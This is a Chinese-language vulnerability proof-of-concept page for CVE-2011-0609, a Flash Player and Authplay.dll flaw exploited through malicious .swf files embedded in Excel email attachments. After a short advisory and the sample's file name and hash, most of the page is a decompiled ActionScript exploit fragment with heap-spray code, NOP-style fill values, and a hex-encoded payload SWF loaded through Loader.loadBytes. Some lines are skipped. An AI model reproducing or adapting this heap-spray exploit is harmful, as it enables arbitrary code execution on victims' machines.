http://www.pulog.org/poc/1958/CVE-2011-0609/
Adobe Flash Player是一款Flash文件处理程序。Windows、Macintosh、Linux和Solaris操作系统下的Adobe Flash Player 10.2.152.33及之前版本(面向Chrome用户的Adobe Flash Player 10.2.154.18及早期版本),Android下的Adobe Flash Player 10.1.106.16及早期版本,以及Windows和Macintosh操作系统下的Adobe Reader及Acrobat X (10.0.1)和Reader及Acrobat早期10.x和9.x版本所提供的Authplay.dll组件存在严重安全漏洞,可能导致执行任意代码。该漏洞已在网络上被积极利用:攻击者把恶意Flash(.swf)文件嵌入Microsoft Excel(.xls)文档,并通过Email附件进行攻击。在Adobe Reader和Acrobat中,Adobe Reader X不受此漏洞影响。
[+]info:
~~~~~~~~~
CVE-2011-0609 - Adobe Flash Player ZeroDay
Filename: crsenvironscan.xls
Size:126,444 bytes
MD5 Hash: 4BB64C1DA2F73DA11F331A96D55D63E2
[+]poc:
~~~~~~~~~
漏洞利用的ActionScript(反编译片段,行号不连续,部分内容已省略)
003 | import flash.display.*; |
004 | import flash.system.*; |
005 | import flash.utils.*; |
007 | public class hs extends MovieClip |
009 | static const POOL_SIZE:int = 1048576; |
010 | static var allocs:Array; |
011 | static var pool:ByteArray; |
012 | static var dstSize:int; |
013 | static var allocCount:int; |
014 | static var cevent:Function; |
015 | static var childRef:DisplayObject = null ; |
016 | static var container:Sprite = null ; |
020 | var _loc_1:* = new ByteArray(); |
021 | _loc_1.endian = Endian.LITTLE_ENDIAN; |
025 | if (_loc_3 < 5140 - 32) |
027 | _loc_1.writeInt(336860180); |
031 | _loc_1.writeInt(2425393296); |
032 | _loc_1.writeInt(2425393296); |
033 | var _loc_4:String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|
034 | _loc_1.writeBytes(hexToBin(_loc_4)); |
035 | _loc_3 = _loc_1.length; |
039 | _loc_1.writeInt(336860180); |
043 | alloc(_loc_1, 1048576 - 1536 - 36); |
044 | var _loc_5:* = new ByteArray(); |
045 | _loc_5.writeBytes(pool, 0, 1048576 - 3840 - 36); |
052 | var _loc_7:* = new ByteArray(); |
053 | _loc_7.writeBytes(_loc_5, 0, 1048576 - 3840 - 36); |
058 | var _loc_8:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b6.............[skipped]....................." ; |
059 | var _loc_9:* = new Loader(); |
060 | var _loc_10:* = new LoaderContext( false ); |
061 | _loc_9.loadBytes(hexToBin(_loc_8), _loc_10); |
062 | childRef = this .addChild(_loc_9); |
066 | public static function init_pool(param1) |
068 | hs.pool = new ByteArray(); |
069 | hs.pool.writeBytes(param1); |
070 | while (hs.pool.length < 1048576) |
073 | var _loc_3:* = new ByteArray(); |
074 | _loc_3.writeBytes(hs.pool); |
075 | hs.pool.writeBytes(_loc_3); |
080 | public static function alloc(param1, param2) |
082 | if (hs.allocs == null ) |
084 | hs.allocs = new Array(); |
087 | hs.init_pool(param1); |
091 | public static function free() |
097 | public static function hexToBin(param1:String) : ByteArray |
099 | var _loc_2:* = new ByteArray(); |
100 | var _loc_3:* = param1.length; |
105 | var _loc_5:* = param1.charAt(_loc_4) + param1.charAt((_loc_4 + 1)); |
106 | _loc_2.writeByte(parseInt(_loc_5, 16)); |
漏洞更多信息参见:http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html